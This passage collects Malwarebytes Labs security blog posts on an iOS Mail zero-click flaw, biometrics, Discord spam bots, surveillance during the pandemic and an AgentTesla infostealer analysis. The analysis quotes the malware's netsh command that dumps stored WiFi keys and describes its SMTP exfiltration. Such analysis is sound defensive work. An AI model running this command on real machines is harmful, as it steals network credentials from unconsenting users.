IT NEWS

iOS Mail bug allows remote zero-click attacks

On Monday, ZecOps released a report about a couple concerning vulnerabilities with the Mail app in iOS. These vulnerabilities would allow an attacker to execute arbitrary code in the Mail app or the maild process that assists the Mail app behind the scenes. Most concerning, though, is the fact that even the most current version of iOS, 13.4.1, is vulnerable.

The way the attack works is that the threat actor sends an email message designed to cause a buffer overflow in Mail (or maild). A buffer overflow is a bug in code that allows an attack to happen if the threat actor is able to fill a block of memory beyond its capacity. Essentially, the attacker writes garbage data that fills up the memory, then writes code that overwrites existing code in adjoining memory, which later gets executed by the vulnerable process.

The bad news

The vulnerabilities disclosed by ZecOps would allow an attacker to use such a buffer overflow to attack an iOS device remotely, on devices running iOS 6 through iOS 13.4.1. (ZecOps writes that it may work on even older versions of iOS, but they did not test that.)

On iOS 12, the attack requires nothing more than viewing a malicious email message in the Mail app. It would not require tapping a link or any other content within the message. On iOS 13, the situation is worse, as the attack can be carried out against the maild process in the background, without requiring any user interaction (ie, it is a “zero-click vulnerability”).

In the case of infection on iOS 13, there would be no significant sign of infection, other than temporary slowness of the Mail app. In some cases, evidence of a failed attack may be present in the form of messages that have no content and cannot be displayed.

ZecOps iOS Mail app failed attacks

The messages—shown in the image above from the ZecOps blog—may be visible for a limited time. Once an attack is successful, the attacker would presumably use access to the Mail app to delete these messages, so the user may never see them.

The good news

I know how this sounds. This is an attack that can be carried out by any threat actor who has your email address, on the latest version of iOS, and the infection happens in the background without requiring action from the user. How is there good news here?!

Fortunately, there is. The vulnerabilities revealed by ZecOps only allow an attack of the Mail app itself. Using those vulnerabilities, an attacker would be able to capture your email messages, as well as modify and delete messages. Presumably the attacker would also be able to conduct other normal Mail operations, such as sending messages from your email address, although this was not mentioned. While this isn’t exactly comforting, it falls far short of compromising the entire device.

In order to achieve a full device compromise, the attacker would need to have another vulnerability. This means that if you have version 13.4.1, it would require a publicly unknown vulnerability, which would for the most part restrict such an attack to a nation-state-level adversary.

In other words, someone would have to be willing to risk burning a zero-day vulnerability, worth potentially a million dollars or more, to infect your phone. This means that you’re unlikely to be infected unless some hostile government or other powerful group is interested in spying on you.

If you are, for example, a human rights advocate working against a repressive regime, or a member of an oppressed minority in such a country, you may be a target. Similarly, if you are a journalist covering such news, you may be a target. You could also be at risk if you are an important business person, such as a CEO or CFO at a major corporation, or hold an important role in the government. The average person will not be at significant risk from this kind of attack.

Why disclose now?

It is common practice as part of “responsible disclosure” to avoid public mention of a major vulnerability until after it has been fixed, or until sufficient time has passed that it is believed the software or hardware vendor does not intend to fix the vulnerability in a timely fashion. Release of this kind of information before a fix is available can lead to increased danger to users, as hackers who learn that a vulnerability exists can find it for themselves.

Of course, this must be balanced against the risk of existing attacks that are going undetected. Disclosure can help people who are under active attack to discover the problem, and can help people who are not yet under attack learn how to prevent an attack.

With this in mind, ZecOps mentioned three reasons why they chose to disclose now:

  1. Since the disclosed vulnerabilities can’t be used to compromise the entire device without additional vulnerabilities, the risk of disclosure is lower.
  2. Apple has released a beta of iOS 13.4.5, which addresses the issue. Although a fix in beta is not exactly the same as a fix in a public release, the changes in the beta could be analyzed by an attacker, which would lead to discovery of the vulnerabilities. Essentially, the vulnerabilities have been disclosed to malicious hackers already, but the public was unaware.
  3. At least six organizations were under active attack using these vulnerabilities. (The organizations were not named.)

What you should do

First, don’t panic. As mentioned, this is not a widespread attack against everyone using an iPhone. There have been other zero-click vulnerabilities used to push malware onto iPhones in the past, yet none have ever been widespread. This is because the more widespread such an attack becomes, the more likely it is to be spotted, and subsequently fixed by Apple.

To protect their investment in million-dollar iOS zero-day vulnerabilities, powerful organizations use those vulnerabilities sparingly, only against targeted individuals or groups. Thus, unless you’re someone who might be targeted by a hostile nation or other powerful organization, you’re not likely to be in danger.

However, the risk does increase following disclosure, as malicious hackers can discover and use the vulnerability to attack Mail, at least. So you shouldn’t ignore the risk, either.

As much as I’d like to say, “Install Malwarebytes, run a scan, and remove the malware,” I can’t. Unlike macOS, installing antivirus software isn’t possible on iOS, due to Apple restrictions. So there is no software that can scan an iPhone or iPad for malware.

This, plus the lack of noticeable symptoms, means that it will be difficult to determine whether you’ve been affected. As always with iOS, if you have reason to believe you’ve been infected, your only option is to reset your device to factory state and set it up again from scratch as if it were a new device.

As for precautions to avoid infection, there are a couple things you can do. One would be to install the iOS 13.4.5 beta, which contains a fix for the bug. This is not something that’s easy to do, however, as you need an Apple developer account to download the beta. Plus, using a beta version of iOS, which may have bugs, isn’t recommended for all users.

The other possible security measure would be to disable Mail until the next version of iOS is released publicly. To do so, open the Settings app and scroll down to Password & Accounts. Tap that, then look at the list of accounts.

iOS internet accounts

You may have multiple accounts, as shown above, or only one. For any accounts that say “Mail” underneath, that means that you’re using Mail to download mail for that account. Tap on each account, and on the next screen, look for the Mail toggle.

iOS internet accounts mail

The image above shows that Mail is enabled. Toggle the switch to off. Do this for each of your accounts, and do not switch Mail back on again until you’ve updated to a version of iOS newer than 13.4.1.

Stay safe, everyone!

The post iOS Mail bug allows remote zero-click attacks appeared first on Malwarebytes Labs.

The passwordless present: Will biometrics replace passwords forever?

When it comes to securing your sensitive, personally identifiable information against criminals who can engineer countless ways to snatch it from under your nose, experts have long recommended the use of strong, complex passwords. Using long passphrases with combinations of numbers, letters, and symbols that cannot be easily guessed has been the de facto security guidance for more than 20 years. But does it stand up to scrutiny?

A short and easy-to-remember password is typically preferred by users because of convenience, especially since they average more than 27 different online accounts for which credentials are necessary. However, such a password has low entropy, making it easy to guess or brute force by hackers.

If we factor in the consistent use of a single low-entropy password across all online accounts, despite repeated warnings, then we have a crisis on our hands—especially because remembering 27 unique, complex passwords, PIN codes, and answers to security questions is likely overwhelming for most users.

Instead of faulty and forgettable passwords, tech developers are now pushing to replace them with is something that all human beings have: ourselves.

Bits of ourselves, to be exact. Dear reader, let’s talk biometrics.

Biometrics then and now

Biometrics—or the use of our unique physiological traits to identify and/or verify our identities—has been around for much longer than our computing devices. Handprints, which are found in caves that are thousands of years old, are considered one of the earliest forms of physiological biometric modality. Portuguese historian and explorer João de Barros recorded in his writings that 14th century Chinese merchants used their fingerprints to finalize transaction deals, and that Chinese parents used fingerprints and footprints to differentiate their children from one another.

Hands down, human beings are the best biometric readers—it’s innate in all of us. Studying someone’s facial features, height, weight, or notable body markings, for example, is one of the most basic and earliest means of identifying unfamiliar individuals without knowing or asking for their name. Recognizing familiar faces among a sea of strangers is a form of biometrics, as is meeting new people or determining which person out of a lineup committed a certain crime.

As the population boomed, the process of telling one human being from another became much more challenging. Listing facial features and body markings were no longer enough to accurately track individual identities at the macro level. Therefore, we developed sciences (anthropometry, from which biometrics stems), systems (the Henry Classification System), and technologies to aid us in this nascent pursuit. Biometrics didn’t really become “a thing” until the 1960’s—the same era of the emergence of computer systems.

Today, many biometric modalities are in place for identification, classification, education, and, yes, data protection. These include fingerprints, voice recognition, iris scanning, and facial recognition. Many of us are familiar with these modalities and use them to access our data and devices every day. 

Are they the answer to the password problem? Let’s look at some of these biometrics modalities, where they are normally used, how widely adopted and accepted they are, and some of the security and privacy concerns surrounding them.

Fingerprint scanning/recognition

Fingerprint scanning is perhaps the most common, widely-used, and accepted form of biometric modality. Historically, fingerprints—and in some cases, full handprints—were used as a means to denote ownership (as we’ve seen in cave paintings) and to prevent impersonation and the repudiation of contracts (as what Sir William Herschel did when he was part of the Indian Civil Service in the 1850’s).

sl sl 1526 herschelfprint i 01 000
Fingerprint and handprint samples taken by William Herschel as part of “The Beginnings of Finger-printing”

Initially, only those in law enforcement could collect and use fingerprints to identify or verify individuals. Today, billions of people around the world are carrying a fingerprint scanner as part of their smartphone devices or smart payment cards.

While fingerprint scanning is convenient, easy-to-use, and has fairly high accuracy (with the exception of the elderly, as skin elasticity decreases with age), it can be circumvented—and white hat hackers have proven this time and time again.

When Apple first introduced TouchID, its then-flagship feature on the 2013 iPhone 5S, the Chaos Computer Club (CCC) from Germany bypassed it a day after its reveal. A similar incident happened in 2019, when Samsung debuted the Galaxy S10. Security researchers from Tencent even demonstrated that any fingerprint-locked smartphone can be hacked, whether they’re using capacitive, optical, or ultrasonic technologies.

“We hope that this finally puts to rest the illusions people have about fingerprint biometrics,” said Frank Rieger, spokesperson of the CCC, after the group defeated the TouchID. “It is plain stupid to use something that you can’t change and that you leave everywhere every day as a security token.”

Voice recognition

Otherwise known as speaker recognition or speech recognition, voice recognition is a biometric modality that, at base level, recognizes sound. However, in recognizing sound, this modality must also measure complex physiological components—the physical size, shape, and health of a person’s vocal chords, lips, teeth, tongue, and mouth cavity. In addition, voice recognition tracks behavioral components—the accent, pitch, tone, talking pace, and emotional state of the speaker, to name a few.

voice speech recog
There are two variants of voice recognition: speaker dependent and speaker independent.

Voice recognition is used today in computer operating systems, as well as in mobile and IoT devices for command and search functionality: Siri, Alexa, and other digital assistants fit this profile. There are also software programs and apps, such as translation and transcription services, reading assistance, and educational programs designed with voice recognition, too.

There are currently two variants of voice recognition used today: speaker dependent and speaker independent. Speaker dependent voice recognition requires training on a user’s voice. It needs to be accustomed to the user’s accent and tone before recognizing what was said. This is the type that is used to identify and verify user identities. Banks, tax offices, and other services have bought into the notion of using voice for customers to access their sensitive financial data. The caveat here is that only one person can use this system at a time.

Speech independent voice recognition, on the other hand, doesn’t need training and recognizes input from multiple users. Instead, it is programmed to recognize and act on certain words and phrases. Examples of speaker independent voice recognition technology are the aforementioned virtual assistants, such as Windows’ Cortana, and automated telephone interfaces.

But voice recognition has its downsides, too. While it has improved in accuracy by leaps and bounds over the last 10 years, there are still some issues to solve, especially for women and people of color. Like fingerprint scanning, voice recognition is also susceptible to spoofing. Alternatively, it’s easy to taint the quality of a voice recording with a poor microphone or background noise that may be difficult to avoid.

To prove that using voice to authenticate for account access is an insufficient method, researchers from Salesforce were able to break voice authentication at Black Hat 2018 using voice synthesis, a piece of technology that can creates life-like human voices, and machine learning. They also found that the synthesized voice’s quality only needed to be good enough to do the trick.

“In our case, we only focused on using text-to-speech to bypass voice authentication. So, we really do not care about the quality of our audio,” said John Seymour, one of the researchers. “It could sound like garbage to a human as long as it bypasses the speech APIs.”

All this, and we haven’t even talked about voice deepfakes yet. Imagine fraudsters having the ability to pose as anyone they want using artificial intelligence and a five second recording of their voice. As applicable as voice recognition is as a technology, it’s perhaps the weakest form of biometric identity verification.

Iris scanning or iris recognition

Advocates of iris scanning claim that iris images are quicker and more reliable than fingerprint scanning as a means of identification, as irises are less likely to be altered or obscured than fingerprints.

iris scan sample
Sample iris pattern image. The bit stream (top left) was extracted based on this particular eye’s lines and colors. This is then used to compare with other patterns in a database.

Iris scanning is usually conducted with an invisible infrared light that passes over the iris wherein unique patterns and colors are read, analyzed, and digitized for comparison to a database of stored iris templates either for identification or verification.

Unlike fingerprint scanning, which requires a finger to be pressed against a reader, iris scanning can be done both within close range and from afar, as well as standing still and on-the-move. These capabilities raise significant privacy concerns, as individuals and groups of people can be surreptitiously scanned and captured without their knowledge or consent.

There’s an element of security concern with iris scanning as well: Third parties normally store these templates, and we have no idea how iris templates—or all biometric templates—are stored, secured, and shared. Furthermore, scanning the irises of children under 4 years old generally produces scans of inferior quality compared to their adult counterparts.

Iris scanners, especially those that market themselves as airtight or unhackable, haven’t escaped cybercriminals’ radar. In fact, such claims often fuel their motivation to prove the technology wrong. In 2019, eyeDisk, the purported “unhackable USB flash drive,” was hacked by white hat hackers at PenTest Partners. After making a splash breaking Apple’s TouchID in 2013, the CCC hacked Samsung’s “ultra secure” iris scanner for the Galaxy S8 four years later.

“The security risk to the user from iris recognition is even bigger than with fingerprints as we expose our irises a lot,” said Dirk Engling, a CCC spokesperson. “Under some circumstances, a high-resolution picture from the Internet is sufficient to capture an iris.”

Facial recognition

This biometric modality has been all the rage over the last five years. Facial recognition systems analyze images or video of the human face by mapping its features and comparing them against a database of known faces. Facial recognition can be used to grant access to accounts and devices that are typically locked by other means, such as a PIN, password, or other form of biometric. It can be used to tag photos on social media or optimize image search results. And it’s often used in surveillance, whether to prevent retail crime or help police officers identify criminals.

As with iris scanners, a concern of security and privacy advocates is the ability of facial recognition technology to be used in combination with public (or hidden) cameras that don’t require knowledge or consent from users. Combine this with lack of federal regulation, and you once again have an example of technology that has raced far ahead of our ability to define its ethical use. Accuracy is another point of contention, and multiple studies have backed up its imprecision, especially when identifying people of color.

Private corporations, such as Apple, Google, and Facebook have developed facial recognition technology for identification and authentication purposes, while governments and law enforcement implement it in surveillance programs. However, citizens—the target of this technology—have both tentatively embraced facial recognition as a password replacement and rallied against its Big Brother application via government monitoring.

When talking about the use of facial recognition technology for government surveillance, China is perhaps the top country that comes to mind. To date, China has at least 170 million CCTV cameras—and this number is expected to increase by almost threefold by 2021.

With this biometric modality being used at universities, shopping malls, and even public toilets (to prevent people from taking too many tissues), surveys show Chinese citizens are wary of the data being collected. Meanwhile, the facial recognition industry in China has been the target of US sanctions for violations of human rights.

shutterstock 1083572315 1
China is one of the top five countries named in the “State Enemies of the Internet” list, which was published by Reporters Without Borders in 2013.

“AI and facial recognition technology are only growing and they can be powerful and helpful tools when used correctly, but can also cause harm with privacy and security issues,” wrote Nicole Martin in Forbes. “Lawmakers will have to balance this and determine when and how facial technology will be utilized and monitor the use, or in some cases abuse, of the technology.”

Behavioral biometrics

Otherwise known as behaviometrics, this modality involves the reading of measurable behavioral patterns for the purpose of recognizing or verifying a person’s identity. Unlike other biometrics mentioned in this article, which are measured in a quick, one-time scan (static biometrics), behavioral biometrics is built around continuous monitoring and verification of traits and micro-habits.

shutterstock 1249475749
Gait recognition, or gait analysis, is a popular example of behavioral biometrics.

This could mean, for example, that from the time you open your banking app to the time you have finished using it, your identity has been checked and re-checked multiple times, ensuring your bank that you still are who you claim you are for the entire time. The bonus? The process is frictionless, so users don’t realize the analysis is happening in the background.

Private institutions have taken notice of behavioral biometrics—and the technology and systems behind this modality—because it offers a multitude of benefits. It can be tailored according to an organization’s needs. It’s efficient and can produce results in real time. And it’s secure, since biometric data of this kind is difficult to steal or replicate. The data retrieved from users is also highly accurate.

Like any other biometric modality, using behavioral biometrics brings up privacy concerns. However, the data collected by a behavioral biometric application is already being collected by device or network operators, which is recognized by standard privacy laws. Another plus for privacy advocates: Behavioral data is not defined as personally identifiable, although it’s being considered for regulation so that users are not targeted by advertisers.

While voice recognition (which we mentioned above), keystroke dynamics, and signature analysis are all under the umbrella of behavior biometrics, take note that organizations that employ a behavioral biometric scheme do not use these modalities.

Biometrics vs. passwords

At face value, any of the biometric modalities available today might appear to be superior to passwords. After all, one could argue that it’s easy for numeric and alphanumeric passwords to be stolen or hacked. Just look at the number of corporate breaches and millions of affected users bombarded by scams, phishing campaigns, and identity theft. Meanwhile, theft of biometric data has not yet happened at this scale (to our knowledge).

While this argument may have some merit, remember that when a password is compromised, it can be easily replaced with another password, ideally one with higher entropy. However, if biometric data is stolen, it’s impossible for a person to change it. This is, perhaps, the top argument against using biometrics.

Because a number of our physiological traits can be publicly observed, recorded, scanned from afar, or readily taken as we leave them everywhere (fingerprints), it is argued that consumer-grade biometrics—without another form of authentication—are no more secure than passwords.

Not only that, but the likelihood of cybercriminals using such data to steal someone’s identity or to commit fraud will increase significantly over time. Biometric data may not (yet) open new banking accounts under your name, but it can be abused to gain access to devices and establishments that have a record of your biometric. Thanks to new “couch-to-plane” schemes several airports are beginning to adapt, stolen biometrics can now put a fraudster on a plane to any destination they wish to go.

What about DNA as passwords?

Using one’s DNA as password is a concept that is far from far-fetched, although not widely-known or used in practice. In a recent paper, authors Madhusudhan R and Shashidhara R have proposed the use of a DNA-based authentication scheme within mobile environments using a Hyper Elliptic Curve Cryptosystem (HECC), allowing for greater security in exchanging information over a radio link. This is not only practical but can also be implemented on resource-constrained mobile devices, the authors say.

This may sound good on paper, but as the idea is still purely theoretical, privacy-conscious users will likely need a lot more convincing before considering to use their own DNA for verification purposes. While DNA may seem like a cool and complicated way to secure our sensitive information, much like out fingerprints, we leave DNA behind all the time. And, just as we can’t change our fingerprints, our DNA is permanent. Once stolen, we can never use it for verification.

Furthermore, the once promising idea of handing over your DNA to be stored in a giant database in exchange for learning your family’s long-forgotten secrets seems to have lost its charm. This is due to increased awareness among users of the privacy concerns surrounding commercial DNA testing, including how the companies behind them have been known to hand over data to pharmaceutical companies, marketers, and law enforcement. Not to mention, studies have shown that such test results are inaccurate about 40 percent of the time.

With so many concerns, perhaps it’s best to leave the notion of using DNA as your proverbial keys to the kingdom behind and instead focus on improving how you create, use, and store passwords instead.

Passwords (for now) are here to stay

As we have seen, biometrics isn’t the end-all, be-all most of us expected. However, this doesn’t mean biometrics cannot be used to secure what you hold dear. When we do use them, they should be part of a multi-authentication scheme—and not a password replacement.

What does that look like in practice? For top level security that solves the issue of having to remember so many complex passwords, store your account credentials in a password manager. Create a complex, long passphrase as the master password. Then, use multi-factor authentication to verify the master password. This might involve sending a passcode to a second device or email address to be entered into the password manager. Or, if you’re an organization willing to invest in biometrics, use a modality such as voice recognition to speak an authentication phrase.

So, are biometrics here to stay? Definitely. But so are passwords.

The post The passwordless present: Will biometrics replace passwords forever? appeared first on Malwarebytes Labs.

A week in security (April 13 – 19)

Last week on Malwarebytes Labs, we looked at how to avoid Zoom bombing, weighed the risks of surveillance versus pandemics, and dug into a spot of WiFi credential theft.

Other cybersecurity news:

  • Malware creeps back into the home: With a pandemic forcing much of the workforce into remote positions, it’s worth noting that a study found malware on 45 percent of home office networks. (Source: TechTarget)
  • Free shopping scam: Coronavirus fraudsters attempt to cash in on people’s fears with fake free offers at Tesco. (Source: Lincolnshire Live)
  • Browser danger: Researchers tackle a fake browser extension campaign that targets users of Ledger and other plugins. (source: MyCrypto/PhishFort)
  • Phishing for cash: Research shows how phish kit selling is a profitable business. (Source: Help Net Security)
  • Big problem, big bucks: The FTC thinks Americans have lost out to the tune of 13 million dollars thanks to coronavirus scams. (Source: The Register)
  • Facebook tackles bots: A walled off simulation has been created to dig deep into the world of scams and trolls. (Source: The Verge)
  • Apple of my eye: Apple remains the top brand for phishing scammers to target. (Source: CISO Mag)
  • Fake Valorant beta keys: Reports have surfaced of fake tools promising access to upcoming game Valorant’s beta, with horribly predictable results. (Source: CyberScoop)

Stay safe, everyone!

The post A week in security (April 13 – 19) appeared first on Malwarebytes Labs.

Discord users tempted by bots offering “free Nitro games”

The last few weeks have seen multiple instances of problematic bots appearing in Discord channels. They bring tidings of gifts, but the reality is quite a bit different. Given so many more young kids and teens are at home during the current global lockdown, they may well see this scam bouncing around their chat channels. Worried parents may want to point them in this direction to learn about the warning signs.

What is Discord?

Sorry, teens who’ve been pointed in this direction: You can skip this part. For anyone else who needs it, Discord is a mostly gaming-themed communication platform incorporating text, voice, and video. It’s not to be mixed up with Twitch, which is more geared toward live gaming streams, e-sports competitions, and older recordings of big events.

DIY bots: part of the ecosystem

One of the most interesting features of Discord is how anyone can make their own channel bot. Simply bolt one together, keep the authorization token safe, and invite it into your channel. If you run into a bot you like the look of in someone else’s channel, you can usually invite them back into your own (or somewhere else), but you’ll need to have “manage server permissions” on your account.

You have to do a little due diligence, as things can go wrong if you don’t keep your bot and account locked down. Additionally, the very openness available to build your own bot means people can pretty much make what they like. It’s up to you as a responsible Discord user to keep that in mind before inviting all and sundry into the channel. Not all bots have the best of intentions, as we’re about to find out.

Discord in bot land

discordbots5

Click to enlarge

If you’re minding your business in Discord, you could be sent a direct message similar to the one above. It looks official, calls itself “Twitch,” and goes on to say the following:

Exclusive partnership

We are super happy to announce that Discord has partnered with Twitch to show some love to our super great users! From April 05, 2020 until April 15, 2020 all our users will have access to Nitro Games

You have to invite me to your servers

If there’s one thing people can appreciate in the middle of a global pandemic, it’s freebies. Clicking the blue text will pop open an invite notification:

discordbots6
Click to enlarge

Add bot to: [server selection goes here]

This requires you to have manage server permissions in this server.

It then goes on to give some stats about whatever bot you’re trying to invite. The one above has been active since April 13, 2019, and is used across 1,000 servers so it’s got a fair bit of visibility. As per the above notification, “This application cannot read your messages or send messages as you.”

Sounds good, right? Except there are some holes in the free Nitro games story.

Nitro is a real premium service offered by Discord offering a variety of tools and functions for users. The problem is that the games offered by Nitro were shut down last October due to lack of use. What, exactly then, is being invited into servers?

Spam as a service

Multiple Discord users have reported these bots in the last few days, mostly in relation to spam, nude pic channels, and the occasional potentially dubious download sitting on free file hosting websites. A few folks have mentioned phishing, though we’ve seen no direct links to actual phishes taking place at time of writing.

Another Discord user mentioned if given access, the bot will (amongst other things) ban everyone from the server and delete all channels, but considering the aim of the game here is to spam links and draw additional people in, this would seem to be counterproductive to the main goal of increasing traffic in specific servers.

Examples: Gaming spam

Here’s one server offered up as a link from one of the bots as reported by a user on Twitter:

discordbots1

Click to enlarge

This claims to be an accounts center for the soon-to-be-smash-hit game Valorant, currently in closed Beta. The server owner explains they’d rather give accounts away than sell them to grow their channel, which is consistent with the bots we’ve seen spreading links rather than destroying channels. While they object to “botted invites,” claiming they’ll ban anyone shown to be inviting via bots, they’re also happy to suggest spamming links to grow their channel numbers.

discordbots2

Click to enlarge

discordbots3

Click to enlarge

It’s probably a good idea they’re not selling accounts, because Riot take a dim view of selling; having said that, promoting giveaway Discords doesn’t seem too popular either.

Examples: Discord goes XXX

Before we can stop and ponder our Valorant account invite frenzy, a new private message has arrived from a second bot. It looks the same as the last bogus Nitro invite, but with a specific addition:

discordbots11

You’ve been invited to join a server: JOIN = FREE DISCORD NITRO AND NUDES

Nudes? Well, that’s a twist.

discordbots7

Click to enlarge

This is a particularly busy location, with no fewer than 15,522 members and roughly 3,000 people online. The setup is quite locked down: There’s no content available unless you work for it, by virtue of sending invites to as many people as possible.

discordbots9

Click to enlarge

The Read Me essentially says little beyond “Invite people to get nudes.”

discordbots8

Click to enlarge

Elsewhere it promotes a “nudes” Twitter profile, with the promise of videos for retweets. The account, in keeping with the general sense of lockdown, has no nudity on it.

discordbots10

Click to enlarge

As you can guess, these bots are persistent. Simply lingering in a server can result in a procession of invites to your account.

discordbots12

Click to enlarge

We were sent to a variety of locations during testing, including some which could have been about films and television or pornography, or both, but in most cases, it was hard to say, as almost every place we landed locks content down.

This makes sense for the people running these channels: If everyone was open from the get-go, there’d be no desire from the people visiting to go spamming links in the dash to get some freebies.

Bots on parade

We didn’t see a single place linked from any of these bots that mentioned free Discord Nitro—it’s abandoned entirely upon entry. Visitors probably have no reason to question otherwise, and so will go off to do their free promotional duties. Again, while it’s entirely possible bots out there are wiping out people’s communities, during testing all we saw in relation to the supposed Nitro spam bots was a method for channel promotion.

If you have server permissions, you should think carefully about which bots you allow into your server. There are no free games, but there is a whole lot of spam on the horizon if you’re not paying attention.

The post Discord users tempted by bots offering “free Nitro games” appeared first on Malwarebytes Labs.

New AgentTesla variant steals WiFi credentials

AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. The actor behind this malware is constantly maintaining it by adding new modules. One of the new modules that has been added to this malware is the capability to steal WiFi profiles.

AgentTesla was first seen in 2014, and has been frequently used by cybercriminals in various malicious campaigns since. During the months of March and April 2020, it was actively distributed through spam campaigns in different formats, such as ZIP, CAB, MSI, IMG files, and Office documents.

Newer variants of AgentTesla seen in the wild have the capability to collect information about a victim’s WiFi profile, possibly to use it as a way to spread onto other machines. In this blog, we review how this new feature works.

Technical analysis

The variant we analyzed was written in .Net. It has an executable embedded as an image resource, which is extracted and executed at run-time (Figure 1).

figure1
Figure 1. Extract and execute the payload.

This executable (ReZer0V2) also has a resource that is encrypted. After doing several anti-debugging, anti-sandboxing, and anti-virtualization checks, the executable decrypts and injects the content of the resource into itself (Figure 2).

figure2
Figure 2. Decrypt and execute the payload.

The second payload (owEKjMRYkIfjPazjphIDdRoPePVNoulgd) is the main component of AgentTesla that steals credentials from browsers, FTP clients, wireless profiles, and more (Figure 3). The sample is heavily obfuscated to make the analysis more difficult for researchers.

figure3
Figure 3. Second payload

To collect wireless profile credentials, a new “netsh” process is created by passing “wlan show profile” as argument (Figure 4). Available WiFi names are then extracted by applying a regex: “All User Profile * :  (?<profile>.*)”, on the stdout output of the process.

figure4
Figure 4 Creating netsh process

In the next step for each wireless profile, the following command is executed to extract the profile’s credential: “netsh wlan show profile PRPFILENAME key=clear” (Figure 5).

figure5
Figure 5. Extract WiFi credentials

String encryption

All the strings used by the malware are encrypted and are decrypted by Rijndael symmetric encryption algorithm in the “<Module>.u200E” function. This function receives a number as an input and generates three byte arrays containing input to be decrypted, key and IV (Figure 6).

Figure6
Figure 6. u200E function snippet

For example, in Figure 5, “119216” is decrypted into “wlan show profile name=” and “119196” is decrypted into “key=clear”.

In addition to WiFi profiles, the executable collects extensive information about the system, including FTP clients, browsers, file downloaders, and machine info (username, computer name, OS name, CPU architecture, RAM) and adds them to a list (Figure 7).

figure7
Figure 7. List of collected info

Collected information forms the body section of a SMTP message in html format (Figure 8):

figure8
Figure 8 Collected data in html format in message body

Note: If the final list has less than three elements, it won’t generate a SMTP message. If everything checks out, a message is finally sent via smtp.yandex.com, with SSL enabled (Figure 9):

figure9
Figure 9. Build Smtp message

The following diagram shows the whole process explained above from extraction of first payload from the image resource to exfiltration of the stolen information over SMTP:

Basic Activity Diagram scaled e1586884591811
Figure 10. Process diagram

Popular stealer looking to expand

Since AgentTesla added the WiFi-stealing feature, we believe the threat actors may be considering using WiFi as a mechanism for spread, similar to what was observed with Emotet. Another possibility is using the WiFi profile to set the stage for future attacks.

Either way, Malwarebytes users were already protected from this new variant of AgentTesla through our real-time protection technology.

block 2

Indicators of compromise

AgentTesla samples:

91b711812867b39537a2cd81bb1ab10315ac321a1c68e316bf4fa84badbc09b
dd4a43b0b8a68db65b00fad99519539e2a05a3892f03b869d58ee15fdf5aa044
27939b70928b285655c863fa26efded96bface9db46f35ba39d2a1295424c07b

First payload:

249a503263717051d62a6d65a5040cf408517dd22f9021e5f8978a819b18063b

Second payload: 

63393b114ebe2e18d888d982c5ee11563a193d9da3083d84a611384bc748b1b0

The post New AgentTesla variant steals WiFi credentials appeared first on Malwarebytes Labs.

Mass surveillance alone will not save us from coronavirus

As the pattern-shattering truth of our new lives drains heavy—as coronavirus rends routines, raids our wellbeing, and whiplashes us between anxiety and fear—we should not look to mass digital surveillance to bring us back to normal.

Already, governments have cast vast digital nets. South Koreans are tracked through GPS location history, credit card transactions, and surveillance camera footage. Israelis learned last month that their mobile device locations were surreptitiously collected for years. Now, the government rummages through this enormous database in broad daylight, this time to track the spread of COVID-19. Russians cannot leave home in some regions without scanning QR codes that restrict their time spent outside—three hours for grocery shopping, one hour to walk the dog, half that to take out the trash.

Privacy advocates around the world have sounded the alarm. This month, more than 100 civil and digital rights organizations urged that any government’s coronavirus-targeted surveillance mechanisms respect human rights. The groups, which included Privacy International, Human Rights Watch, Open Rights Group, and the Chilean nonprofit Derechos Digitales, wrote in a joint letter:

“Technology can and should play an important role during this effort to save lives, such as to spread public health messages and increase access to health care. However, an increase in state digital surveillance powers, such as obtaining access to mobile phone location data, threatens privacy, freedom of expression and freedom of association, in ways that could violate rights and degrade trust in public authorities – undermining the effectiveness of any public health response.”

The groups are
right to worry.

Particularly in
the United States, our country’s history of emergency-enabled surveillance has failed
to respect Americans’ right to privacy and to provide measurable, increased
security. Not only did rapid surveillance authorization in the US permit the
collection of, at one point in time, nearly every American’s call detail
records, it also created an unwieldy government program that two decades later became
ineffective, economically costly, and repeatedly noncompliant with the law.

Further, some of the current technology tracking proposals—including Apple and Google’s newly-announced Bluetooth capabilities—either lack the evidence to prove effective or require a degree of mass adoption that no country has proved possible. Other private proposals come from untrusted actors, too.

Finally, the tech-focused solutions cannot alone fill severe physical gaps, including lacking personal protective equipment for medical professionals, non-existent universal testing, and a potentially fatal selection of intensive care unit beds left to survive a country-wide outbreak.

We understand how today feels. In less than one month, the world has emptied. Churches, classrooms, theaters, and restaurants lay vacant, sometimes shuttered by wooden planks fastened over doorways. We grieve the loss of family and friends, of 17 million American jobs and the healthcare benefits they provided, of national, in-person support networks displaced into cyberspace, where the type of vulnerability meant for a physical room is now thrust online.

For a seemingly endless time at home, we curl and wait, emptied all the same.

But mass, digital surveillance alone will not make us whole.

Governments expand surveillance to track coronavirus

First detected in late 2019 in the Hubei province of China,
COVID-19 has now spread across every continent except Antarctica.

To limit the spread of the virus and to prevent overburdened healthcare systems, governments imposed a variety of physical restrictions. California closed all non-essential businesses, Ireland restricted outdoor exercise to 1.2 miles away from the home, El Salvador placed 30-day quarantines on El Salvadorians entering the country from abroad, and Tunisia imposed a nightly 6:00 p.m. – 6:00 a.m. curfew.

A handful of governments took digital action, vacuuming up citizens’
cell phone data, sometimes including their rough location history.  

Last month, Israel unbuttoned a once-secret surveillance program, allowing it to reach into Israelis’ mobile phones not to provide counter-terrorism measures—as previously reserved—but to track the spread of COVID-19. The government plans to use cell phone location data that it had been privately collecting from telecommunications providers to send text messages to device owners who potentially come into contact with known coronavirus carriers. According to The New York Times, the parliamentary subcommittee meant to approve the program’s loosened restrictions never actually voted.

The Lombardy region of Italy—which, until recently, suffered the largest coronavirus swell outside of China—is working with a major telecommunications company to analyze reportedly anonymized cell phone location data to understand whether physical lockdown measures are proving effective at fighting the virus. The Austrian government is doing the same. Similarly, the Pakistani government is relying on provider-supplied location information to send targeted SMS messages to anyone who has come into close, physical contact with confirmed coronavirus patients. The program can only be as effective as it is large, requiring data on massive swaths of the country’s population.

In Singapore, the country’s government publishes grossly detailed information about coronavirus patients on its Ministry of Health public website. Ages, workplaces, workplace addresses, travel history, hospital locations, and residential streets can all be found with a simple click.

Singapore’s coronavirus detection strategy also included a
separate, key component.

